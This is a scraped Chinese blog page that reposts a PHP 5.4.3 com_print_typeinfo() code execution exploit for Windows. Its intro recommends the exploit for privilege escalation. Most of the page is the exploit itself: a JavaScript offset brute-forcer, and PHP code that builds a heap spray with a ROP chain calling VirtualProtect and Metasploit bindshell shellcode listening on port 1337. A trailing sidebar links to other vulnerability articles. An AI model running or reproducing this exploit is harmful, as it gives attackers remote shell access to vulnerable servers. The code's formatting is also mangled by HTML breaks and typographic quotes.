php5.4.3的远程代码执行漏洞，提权挺管用

PHP com_print_typeinfo()的漏洞，通过PHP代码调用”exec”可运行SHELL命令
用这个提权是不是很方便了？

// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)
// Exploit author: 0in (Maksymilian Motyl)
// Email: 0in(dot)email(at)gmail.com
// * Bug with Variant type parsing originally discovered by Condis
// Tested on Windows XP SP3 fully patched (Polish)
===================
offset-brute.html
===================

PHP 5.4.3 0day by 0in & cOndis

</textarea><br> </center><br> <script><br> function sleep(milliseconds) {<br> var start = new Date().getTime();<br> for (var i = 0; i < 1e7; i++) {<br> if ((new Date().getTime() – start) > milliseconds){<br> break;<br> }<br> }<br> }<br> function makeRequest(url, parameters)<br> {<br> var xmlhttp = new XMLHttpRequest();<br> if (window.XMLHttpRequest) {<br> xmlhttp = new XMLHttpRequest();<br> if (xmlhttp.overrideMimeType) {<br> xmlhttp.overrideMimeType(‘text/xml’);<br> }<br> } else if (window.ActiveXObject) {<br> // IE<br> try { xmlhttp = new ActiveXObject(“Msxml2.XMLHTTP”); }<br> catch (e) {<br> try { xmlhttp = new ActiveXObject(“Microsoft.XMLHTTP”); }<br> catch (e) {}<br> }<br> }<br> if (!xmlhttp) {<br> alert(‘Giving up  Cannot create an XMLHTTP instance’);<br> return false;<br> }<br> xmlhttp.open(“GET”,url,true);<br> xmlhttp.send(null);<br> return true;<br> }<br> test=document.getElementById(“log”);<br> for(offset=0;offset<300;offset++)<br> {<br> log.value+=”Trying offset:”+offset+”\r\n”;<br> makeRequest(“0day.php?offset=”+offset);<br> sleep(500);<br> }<br> </script></body></html><br> ===================<br> 0day.php<br> ===================<br> <?php<br> $spray = str_repeat(“\x90″,0×200);<br> $offset=$_GET['offset'];<br> // 775DF0Da # ADD ESP,10 # RETN ** [ole32.dll]<br> $spray = substr_replace($spray, “\xda\xf0\x5d\x77″, (strlen($spray))*-1,(strlen($spray))*-1);<br> // :> 0x048d0030<br> $spray = substr_replace($spray, pack(“L”,0x048d0030+$offset), (strlen($spray)-0×8)*-1,(strlen($spray))*-1);<br> //0x7752ae9f (RVA : 0x0005ae7f) : # XCHG EAX,ESP # MOV ECX,468B0000 # OR AL,3 # RETN [ole32.dll]<br> $spray = substr_replace($spray, “\x9f\xae\x52\x77″, (strlen($spray)-0×10)*-1,(strlen($spray))*-1);<br> // Adress of VirtualProtect 0x7c801ad4<br> $spray = substr_replace($spray, “\xd4\x1a\x80\x7c”, (strlen($spray)-0×14)*-1,(strlen($spray))*-1);<br> // LPVOID lpAddress = 0x048d0060<br> $spray = substr_replace($spray, pack(“L”,0x048d0060+$offset), (strlen($spray)-0x1c)*-1,(strlen($spray))*-1);<br> // SIZE_T dwSize = 0×01000000<br> $spray = substr_replace($spray, “\x00\x00\x10\x00″, (strlen($spray)-0×20)*-1,(strlen($spray))*-1);<br> // DWORD flNewProtect = PAGE_EXECUTE_READWRITE (0×00000040) | 0xffffffc0<br> $spray = substr_replace($spray, “\x40\x00\x00\x00″, (strlen($spray)-0×24)*-1,(strlen($spray))*-1);<br> // __out PDWORD lpflOldProtect = 0×04300070 | 0×105240000<br> // 0x048d0068<br> $spray = substr_replace($spray, pack(“L”,0x048d0068+$offset), (strlen($spray)-0×28)*-1,(strlen($spray))*-1);<br> //0x77dfe8b4 : # XOR EAX,EAX # ADD ESP,18 # INC EAX # POP EBP # RETN 0C ** [ADVAPI32.dll]<br> $spray = substr_replace($spray, “\xb4\xe8\xdf\x77″, (strlen($spray)-0×18)*-1,4);<br> // Ret Address = 0x048d0080<br> $spray = substr_replace($spray, pack(“L”,0x048d0080+$offset), (strlen($spray)-0×48)*-1,4);<br> $stacktrack = “\xbc\x0c\xb0\xc0\x00″;<br> // Universal win32 bindshell on port 1337 from metasploit<br> $shellcode = $stacktrack.”\x33\xc9\x83\xe9\xb0″.<br> “\x81\xc4\xd0\xfd\xff\xff”.<br> “\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d”.<br> “\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96″.<br> “\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2″.<br> “\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0″.<br> “\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41″.<br> “\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82″.<br> “\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2″.<br> “\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39″.<br> “\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9″.<br> “\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b”.<br> “\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a”.<br> “\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88″.<br> “\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01″.<br> “\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20″.<br> “\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e”.<br> “\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39″.<br> “\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44″.<br> “\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96″.<br> “\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38″.<br> “\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9″.<br> “\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09″.<br> “\x4e\x33\xe4\x96\xcd\xcc\x32\x69″;<br> $spray = substr_replace($spray,$shellcode, (strlen($spray)-0×50)*-1,(strlen($shellcode)));<br> $fullspray=”";<br> for($i=0;$i<0x4b00;$i++)<br> {<br> $fullspray.=$spray;<br> }<br> $j=array();<br> $e=array();<br> $b=array();<br> $a=array();<br> $c=array();<br> array_push($j,$fullspray);<br> array_push($e,$fullspray.”W”);<br> array_push($b,$fullspray.”A”);<br> array_push($a,$fullspray.”S”);<br> array_push($c,$fullspray.”!”);<br> $vVar = new VARIANT(0x048d0038+$offset);<br> // Shoot him<br> com_print_typeinfo($vVar); //CRASH -> 102F3986 FF50 10 CALL DWORD PTR DS:[EAX+10]<br> echo $arr;<br> echo $spray;<br> ?></p> </div> </div> </div> </div> </div> <!--PC和WAP自适应版--> <div id="SOHUCS" sid="1274397034840866816"></div> <script type="text/javascript" src="/views/front/js/chanyan.js"></script> <!-- 文章页-底部 动态广告位 --> <div class="youdao-fixed-ad" id="detail_ad_bottom"></div> </div> <div class="col-md-3"> <div class="row" id="ad"> <!-- 文章页-右侧1 动态广告位 --> <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_1"> </div> </div> <!-- 文章页-右侧2 动态广告位 --> <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_2"></div> </div> <!-- 文章页-右侧3 动态广告位 --> <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_3"></div> </div> </div> </div> </div> </div> </div> <div class="container"> <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(漏洞收集)</h4> <div id="paradigm-article-related"> <div class="recommend-post mb30"> <ul class="widget-links"> <li><a href="/article/1744693127580499968.htm" title="某 E-Office v9 任意文件上传【漏洞复现实战】" target="_blank">某 E-Office v9 任意文件上传【漏洞复现实战】</a> <span class="text-muted">H_00c8</span> <div>image一、前言由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。本文章中的漏洞均为公开的漏洞收集，如果文章中的漏洞出现敏感内容产生了部分影响，请及时联系作者，望谅解。二、漏洞原理本次复现漏洞为未公开漏洞CNVD-2021-49104，该漏洞是由于e-office其上传模块中用户输入部分未能妥善处理，攻击者可以构造恶意的上传数据包</div> </li> <li><a href="/article/1730175820070203392.htm" title="某 E-Office v9 任意文件上传漏洞复现实战" target="_blank">某 E-Office v9 任意文件上传漏洞复现实战</a> <span class="text-muted">0x6270</span> <a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/1.htm">漏洞研究</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E6%BC%8F%E6%B4%9E/1.htm">安全漏洞</a> <div>前言由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。本文章中的漏洞均为公开的漏洞收集，如果文章中的漏洞出现敏感内容产生了部分影响，请及时联系作者，望谅解。一、漏洞原理本次复现漏洞为未公开漏洞CNVD-2021-49104，该漏洞是由于e-office其上传模块中用户输入部分未能妥善处理，攻击者可以构造恶意的上传数据包，实现任意代码</div> </li> <li><a href="/article/1706234546380419072.htm" title="【渗透技巧】资产探测及信息收集" target="_blank">【渗透技巧】资产探测及信息收集</a> <span class="text-muted">hacker鬼七</span> <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a> <div>一、前言在众测中，基本上SRC的漏洞收集范围有如下几种形式：形式一：暂时仅限以下系统：www.xxx.com,其他域名不在此次测试范围内形式二：只奖励与*.xxx.com相关的漏洞形式三：无限制形式一，基本被限定了范围形式二，注重于子域名的收集形式三，子域名及相关域名的收集另外，随着企业内部业务的不断壮大，各种业务平台和管理系统越来越多，很多单位往往存在着“隐形资产”，这些“隐形资产”通常被管理员</div> </li> <li><a href="/article/1687746944820129792.htm" title="Drupal YAML 反序列化代码执行漏洞(CVE-2017-6920)" target="_blank">Drupal YAML 反序列化代码执行漏洞(CVE-2017-6920)</a> <span class="text-muted">errorr0</span> <a class="tag" taget="_blank" href="/search/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1.htm">PHP反序列化</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a> <div>事件背景框架漏洞收集老外的CMS框架，比较复杂，数据流向太长，调试需要消耗较多的时间。漏洞说明1.漏洞原理：2017年6月21日，Drupal官方发布了一个编号为CVE-2017-6920的漏洞，影响为Critical。这是DrupalCore的YAML解析器处理不当所导致的一个远程代码执行漏洞，影响8.x的DrupalCore。2.组件描述：Drupal是使用PHP语言编写的开源内容管理框架（C</div> </li> <li><a href="/article/1687746945424109568.htm" title="DRUPAL 8.x远程代码执行漏洞(CVE-2018-7600)" target="_blank">DRUPAL 8.x远程代码执行漏洞(CVE-2018-7600)</a> <span class="text-muted">errorr0</span> <a class="tag" taget="_blank" href="/search/php/1.htm">php</a><a class="tag" taget="_blank" href="/search/drupal/1.htm">drupal</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> <div>事件背景框架漏洞收集CVE-2018-7600有两个POC分别是7和8的，本文仅研究8版本的POC，与其它的文章不同的事，本文我将数据流向调试并记录下来了漏洞说明1.漏洞原理：Drupal对表单请求内容未做严格过滤，因此，这使得攻击者可能将恶意注入表单内容，此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。2.组件描述：Drupal是使用PHP语言编写的开源内容管理框</div> </li> <li><a href="/article/1638342951266476032.htm" title="工信部网络安全威胁和漏洞信息共享平台正式上线运行" target="_blank">工信部网络安全威胁和漏洞信息共享平台正式上线运行</a> <span class="text-muted">测试帮日记</span> <div>自从XX关闭后，一直没找到合适的漏洞信息共享平台，这不，国家队出手了！！！为落实《网络产品安全漏洞管理规定》有关要求，工业和信息化部网络安全管理局组织建设的工业和信息化部网络安全威胁和漏洞信息共享平台（以下简称“平台”）（https://www.nvdb.org.cn）于2021年9月1日正式上线运行。根据《网络产品安全漏洞管理规定》，网络产品提供者应当及时向平台报送相关漏洞信息，鼓励漏洞收集平台</div> </li> <li><a href="/article/1594064590113710080.htm" title="首批入选！知道创宇成为CITIVD信创政务产品安全漏洞专业库技术支撑单位" target="_blank">首批入选！知道创宇成为CITIVD信创政务产品安全漏洞专业库技术支撑单位</a> <span class="text-muted">知道创宇KCSC</span> <a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E6%BC%8F%E6%B4%9E/1.htm">安全漏洞</a><a class="tag" taget="_blank" href="/search/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/1.htm">信息安全</a><a class="tag" taget="_blank" href="/search/%E5%A4%A7%E6%95%B0%E6%8D%AE/1.htm">大数据</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a><a class="tag" taget="_blank" href="/search/%E5%8C%BA%E5%9D%97%E9%93%BE/1.htm">区块链</a> <div>❖近日，国家工业信息安全发展研究中心颁发了首批“信创政务产品安全漏洞专业库技术支撑单位”证书，知道创宇凭借深厚的技术实力与优秀的支撑能力，成功入选信创政务产品安全漏洞专业库（以下简称CITIVD）首批支撑单位。信创产业蓬勃发展，网络安全隐患不可忽视CITIVD是什么？CITIVD依据《网络产品安全漏洞管理规定》，面向信创产品提供者、网络产品安全漏洞收集平台和其他发现漏洞的组织或个人，收集并上报信创</div> </li> <li><a href="/article/1582686396324356096.htm" title="浅谈漏洞来源(CVE,NVD,CNVD,CNNVD)" target="_blank">浅谈漏洞来源(CVE,NVD,CNVD,CNNVD)</a> <span class="text-muted">kaixin201505</span> <a class="tag" taget="_blank" href="/search/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/1.htm">信息安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E6%BC%8F%E6%B4%9E/1.htm">安全漏洞</a> <div>网络安全人士可能会问这样一个问题，安全漏洞是哪里来的，什么渠道，可靠吗。那么多的安全产品，他们的漏洞库都是自己整理的吗？（怎么可能撒），虽然各安全厂商都搞自己的威胁情报中心，但是威胁情报除了自研的，很多还是靠类似公益的机构来支持，比如业界大家都知道的几个平台，我们就简单和大家掰扯掰扯吧。头部的安全厂商会搞自己的漏洞收集平台，也有项目形式的，比如国外的CVE,NVD和国内的CNVD,CNNVD。重点</div> </li> <li><a href="/article/1490906095349161984.htm" title="红队渗透测试 | 攻防 | 学习 | 工具 | 分析 | 研究资料汇总" target="_blank">红队渗透测试 | 攻防 | 学习 | 工具 | 分析 | 研究资料汇总</a> <span class="text-muted">CKCsec</span> <a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/1.htm">安全学习笔记</a><a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.htm">渗透测试</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a> <div>红队渗透测试|攻防|学习|工具|分析|研究资料汇总关注公众号CKCsec安全团队回复0107获取PDF版下载链接目录导航相关资源列表攻防测试手册内网安全文档学习手册相关资源Checklist和基础安全知识产品设计文档学习靶场漏洞复现开源漏洞库工具包集合漏洞收集与Exp、Poc利用物联网路由工控漏洞收集Java反序列化漏洞收集版本管理平台漏洞收集MS与Office漏洞收集Kali环境下拓展插件Nes</div> </li> <li><a href="/article/1296501873037090816.htm" title="Hack The Box——ForwardSlash" target="_blank">Hack The Box——ForwardSlash</a> <span class="text-muted">江左盟宗主</span> <a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.htm">渗透测试</a> <div>目录简介信息收集漏洞发现文件包含漏洞漏洞利用用户chiv的Shell权限提升解密ciphertext用户pain的Shell用户root的Shell总结简介这是一台练习CTF的好靶机，靶机创作者有很多提示，但是也有很多坑，总体来说有一定的难度，涉及文件包含、加解密、逆向分析等知识。通过提示发现备份站点是关键，然后利用文件包含漏洞收集信息发现FTP登录凭据，使用SSH获得用户chiv的Shell，通</div> </li> <li><a href="/article/1282927078957662208.htm" title="Ewebeditor最新漏洞及漏洞大全" target="_blank">Ewebeditor最新漏洞及漏洞大全</a> <span class="text-muted">long892230</span> <a class="tag" taget="_blank" href="/search/%E9%BE%99%E9%93%AD%E6%B4%AA/1.htm">龙铭洪</a><a class="tag" taget="_blank" href="/search/-/1.htm">-</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%AB%99Web/1.htm">网站Web</a><a class="tag" taget="_blank" href="/search/%E9%BE%99%E9%93%AD%E6%B4%AA/1.htm">龙铭洪</a><a class="tag" taget="_blank" href="/search/-/1.htm">-</a><a class="tag" taget="_blank" href="/search/%E4%BA%92%E8%81%94%E7%BD%91/1.htm">互联网</a><a class="tag" taget="_blank" href="/search/%E4%B8%AD%E5%9B%BD%E9%BB%91%E5%AE%A2%E4%B8%93%E6%A0%8F/1.htm">中国黑客专栏</a><a class="tag" taget="_blank" href="/search/asp/1.htm">asp</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/list/1.htm">list</a><a class="tag" taget="_blank" href="/search/function/1.htm">function</a><a class="tag" taget="_blank" href="/search/url/1.htm">url</a><a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a> <div>Ewebeditor最新漏洞及漏洞大全[收集]来源：转载作者：佚名时间：2009-06-0300:04:26以下文章收集转载于网络:)算是比较全面的ewebeditor编辑器的漏洞收集，现在的网站大多数用的都是ewebeditor编辑器，所以ewebeditor漏洞的危害性还是相当大的，做了一下漏洞收集，漏洞修补的方法可去网上查找。漏洞更新日期TM：200929日转自zake’SBlogewebe</div> </li> <li><a href="/article/1281420149072609280.htm" title="漏洞信息收集" target="_blank">漏洞信息收集</a> <span class="text-muted">温柔小薛</span> <a class="tag" taget="_blank" href="/search/web%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%8E%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/1.htm">web渗透测试与代码审计</a> <div>漏洞信息收集注：这是从xmind笔记下导入过来的，排版可能很乱，后期我会整理，请见谅本文目录漏洞信息收集主域名及二级域名探测（总概括）域名探测子域名探测备案号查询googleHACK信息探测子域名探测敏感信息收集（1）敏感信息收集（2）邮箱信息收集社工库历史漏洞收集工具信息收集常见指纹识别方式资产梳理fofa及nmap使用主域名及二级域名探测（总概括）域名探测要对一个站点进行渗透测试之前，一般常见</div> </li> <li><a href="/article/1281167341677199360.htm" title="Ewebeditor最新漏洞及漏洞大全" target="_blank">Ewebeditor最新漏洞及漏洞大全</a> <span class="text-muted">iteye_6233</span> <div>Ewebeditor最新漏洞及漏洞大全[收集]来源：转载作者：佚名时间：2009-06-0300:04:26以下文章收集转载于网络:)算是比较全面的ewebeditor编辑器的漏洞收集，现在的网站大多数用的都是ewebeditor编辑器，所以ewebeditor漏洞的危害性还是相当大的，做了一下漏洞收集，漏洞修补的方法可去网上查找。漏洞更新日期TM：200929日转自zake’SBlogewebe</div> </li> <li><a href="/article/1278615060628914176.htm" title="【渗透技巧】资产探测及信息收集" target="_blank">【渗透技巧】资产探测及信息收集</a> <span class="text-muted">Bypass--</span> <a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.htm">渗透测试</a> <div>一、前言在众测中，基本上SRC的漏洞收集范围有如下几种形式：形式一：暂时仅限以下系统：www.xxx.com,其他域名不在此次测试范围内形式二：只奖励与*.xxx.com相关的漏洞形式三：无限制形式一，基本被限定了范围形式二，注重于子域名的收集形式三，子域名及相关域名的收集另外，随着企业内部业务的不断壮大，各种业务平台和管理系统越来越多，很多单位往往存在着“隐形资产”，这些“隐形资产”通常被管理员</div> </li> <li><a href="/article/1188439582014808064.htm" title="漏洞引擎" target="_blank">漏洞引擎</a> <span class="text-muted">tdcoming</span> <a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/1.htm">漏洞利用</a> <div>漏洞引擎漏洞收集整理，未经作者本人同意，谢绝转载。本文采用自己文章+外链合成，外链在文末注明来源！如有侵权请联系本人删除。所有漏洞提供漏洞利用文章和利用脚本，整理在我小密圈，链接如下：项目地址：https://github.com/tdcoming/Vulnerability-engine点击这里就可以拿到文章和利用poc最新最热|CVE-2019-0708|phpstudy后门|JenkinsG</div> </li> <li><a href="/article/1175361644193198080.htm" title="Zookeeper未授权访问【限定IP方式】" target="_blank">Zookeeper未授权访问【限定IP方式】</a> <span class="text-muted">Jiweilai1</span> <a class="tag" taget="_blank" href="/search/Zookeeper/1.htm">Zookeeper</a> <div>漏洞描述默认情况下，Zookeeper安装不会部署任何身份验证，这使得黑客很容易使用该漏洞收集信息，破坏集群。解决方案本次生产环境中，使用限定IP的方式解决该漏洞。限定集群内的机器拥有权限。解决步骤通过任意一台节点登录ZKCli/usr/software/zookeeper/bin/zkCli.sh-server192.168.157.101对集群内IP授予权限此操作不可逆，须仔细检查授权的IPs</div> </li> <li><a href="/article/1187386107084513280.htm" title="Kali linux渗透测试系列————18、Kali linux 漏洞映射之收集服务漏洞" target="_blank">Kali linux渗透测试系列————18、Kali linux 漏洞映射之收集服务漏洞</a> <span class="text-muted">FLy_鹏程万里</span> <a class="tag" taget="_blank" href="/search/%E3%80%90%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E3%80%91/1.htm">【信息安全】</a><a class="tag" taget="_blank" href="/search/%E3%80%90Kali/1.htm">【Kali</a><a class="tag" taget="_blank" href="/search/Linux%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E9%AB%98%E7%BA%A7%E7%AF%87%E3%80%91/1.htm">Linux渗透测试高级篇】</a><a class="tag" taget="_blank" href="/search/%E2%80%94%E2%80%94%E2%80%94Kali/1.htm">———Kali</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E9%AB%98%E7%BA%A7%E7%AF%87/1.htm">渗透测试高级篇</a><a class="tag" taget="_blank" href="/search/%E9%AB%98%E7%BA%A7%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.htm">高级渗透测试</a> <div>收集服务漏洞服务漏洞收集阶段分为漏洞自动扫描诊断、网络漏洞自动收集、网络应用漏洞自动收集、数据库漏洞自动收集等多个阶段，其中，多数阶段都是利用自动化检测工具和漏洞信息网来实现。在基础设施难以支撑小流量而影响服务的情况下，一般省略该阶段。利用自动化扫描工具前，先在测试平台中获得充分验证，然后方可反映与实际服务。另外，还可以通过基于此类工具的服务器日志分析来掌握最新模式。DirBuster:查看目录结</div> </li> <li><a href="/article/1184322330910892032.htm" title="安全应急响应中心平台的设计与实现" target="_blank">安全应急响应中心平台的设计与实现</a> <span class="text-muted">ad655072f51c</span> <div>摘要：随着网络技术的迅速发展和普及，网络安全已经成为企业必不可少的环节。本文通对现有企业网络安全的调查和分析，结合企业网络安全的要求与平台功能需求，采用B/S结构模块化设计的基本思路。构建了一个基于PHP的通用企业网络安全应急响应中心为企业实现漏洞收集和披露计划。因此，建立适合中小企业的网络安全应急响应中心平台具有十分重要的现实意义。关键字：网络安全；漏洞收集；披露计划；应急响应平台中图分类号：T</div> </li> <li><a href="/article/1188031595890712576.htm" title="java项目遇到风险漏洞示例与解决方案" target="_blank">java项目遇到风险漏洞示例与解决方案</a> <span class="text-muted">Leo187</span> <a class="tag" taget="_blank" href="/search/Java/1.htm">Java</a> <div>项目常见风险漏洞和解决方案记录敏感信息泄露漏洞描述：敏感信息泄露漏洞，是一种通过提交错误请求，使系统出现异常处理并报错，并且将系统程序、配置等敏感信息泄露出来的漏洞。工程师发现系统搜索功能模块中普遍将系统的报错通printStackTrace方法进行反馈，可造成报错信息如实的返回到前端。漏洞影响：攻击者可以利用此漏洞收集系统报错中泄露的数据信息，包括处理函数，系统版本等等。可以通过此类问题获得深入</div> </li> <li><a href="/article/2014390.htm" title="Ewebeditor最新漏洞及漏洞大全" target="_blank">Ewebeditor最新漏洞及漏洞大全</a> <span class="text-muted"></span> <a class="tag" taget="_blank" href="/search/editor/1.htm">editor</a> <div>Ewebeditor最新漏洞及漏洞大全[收集] 来源：转载作者：佚名时间：2009-06-03 00:04:26 下面文章收集转载于网络:) 算是比較全面的ewebeditor编辑器的漏洞收集，如今的站点大多数用的都是ewebeditor编辑器， 所以ewebeditor漏洞的危害性还是相当大的，做了一下漏洞收集，漏洞修补的方法可去网上查找。 漏洞更新日期TM： 2009 2 9日转自z</div> </li> <li><a href="/article/2008855.htm" title="Ewebeditor最新漏洞及漏洞大全" target="_blank">Ewebeditor最新漏洞及漏洞大全</a> <span class="text-muted"></span> <a class="tag" taget="_blank" href="/search/editor/1.htm">editor</a> <div>Ewebeditor最新漏洞及漏洞大全[收集] 来源：转载作者：佚名时间：2009-06-03 00:04:26 下面文章收集转载于网络:) 算是比較全面的ewebeditor编辑器的漏洞收集，如今的站点大多数用的都是ewebeditor编辑器， 所以ewebeditor漏洞的危害性还是相当大的，做了一下漏洞收集，漏洞修补的方法可去网上查找。 漏洞更新日期TM： 2009 2 9日转自z</div> </li> <li><a href="/article/2008105.htm" title="Ewebeditor最新漏洞和漏洞指数" target="_blank">Ewebeditor最新漏洞和漏洞指数</a> <span class="text-muted"></span> <a class="tag" taget="_blank" href="/search/editor/1.htm">editor</a> <div>Ewebeditor最新漏洞和漏洞指数[收集] 来源：转载作者：佚名时间：2009-06-03 00:04:26 下面文章收集转载于网络:) 算是比較全面的ewebeditor编辑器的漏洞收集，如今的站点大多数用的都是ewebeditor编辑器， 所以ewebeditor漏洞的危害性还是相当大的，做了一下漏洞收集，漏洞修补的方法可去网上查找。 漏洞更新日期TM： 2009 2 9日转自z</div> </li> <li><a href="/article/1976893.htm" title="Ewebeditor最新漏洞及漏洞大全" target="_blank">Ewebeditor最新漏洞及漏洞大全</a> <span class="text-muted"></span> <a class="tag" taget="_blank" href="/search/editor/1.htm">editor</a> <div>Ewebeditor最新漏洞及漏洞大全[收集] 来源：转载作者：佚名时间：2009-06-03 00:04:26 下面文章收集转载于网络:) 算是比較全面的ewebeditor编辑器的漏洞收集，如今的站点大多数用的都是ewebeditor编辑器， 所以ewebeditor漏洞的危害性还是相当大的，做了一下漏洞收集，漏洞修补的方法可去网上查找。 漏洞更新日期TM： 2009 2 9日转自z</div> </li> <li><a href="/article/1975655.htm" title="Ewebeditor最新漏洞及漏洞大全" target="_blank">Ewebeditor最新漏洞及漏洞大全</a> <span class="text-muted"></span> <a class="tag" taget="_blank" href="/search/editor/1.htm">editor</a> <div>Ewebeditor最新漏洞及漏洞大全[收集] 来源：转载作者：佚名时间：2009-06-03 00:04:26 下面文章收集转载于网络:) 算是比較全面的ewebeditor编辑器的漏洞收集，如今的站点大多数用的都是ewebeditor编辑器， 所以ewebeditor漏洞的危害性还是相当大的，做了一下漏洞收集，漏洞修补的方法可去网上查找。 漏洞更新日期TM： 2009 2 9日转自z</div> </li> <li><a href="/article/1957715.htm" title="Ewebeditor最新漏洞及漏洞大全" target="_blank">Ewebeditor最新漏洞及漏洞大全</a> <span class="text-muted"></span> <a class="tag" taget="_blank" href="/search/editor/1.htm">editor</a> <div>Ewebeditor最新漏洞及漏洞大全[收集] 来源：转载作者：佚名时间：2009-06-03 00:04:26 下面文章收集转载于网络:) 算是比較全面的ewebeditor编辑器的漏洞收集，如今的站点大多数用的都是ewebeditor编辑器， 所以ewebeditor漏洞的危害性还是相当大的，做了一下漏洞收集，漏洞修补的方法可去网上查找。 漏洞更新日期TM： 2009 2 9日转自z</div> </li> <li><a href="/article/1953840.htm" title="Ewebeditor最新漏洞及漏洞大全" target="_blank">Ewebeditor最新漏洞及漏洞大全</a> <span class="text-muted"></span> <a class="tag" taget="_blank" href="/search/editor/1.htm">editor</a> <div>Ewebeditor最新漏洞及漏洞大全[收集] 来源：转载作者：佚名时间：2009-06-03 00:04:26 下面文章收集转载于网络:) 算是比較全面的ewebeditor编辑器的漏洞收集，如今的站点大多数用的都是ewebeditor编辑器， 所以ewebeditor漏洞的危害性还是相当大的，做了一下漏洞收集，漏洞修补的方法可去网上查找。 漏洞更新日期TM： 2009 2 9日转自z</div> </li> <li><a href="/article/1950860.htm" 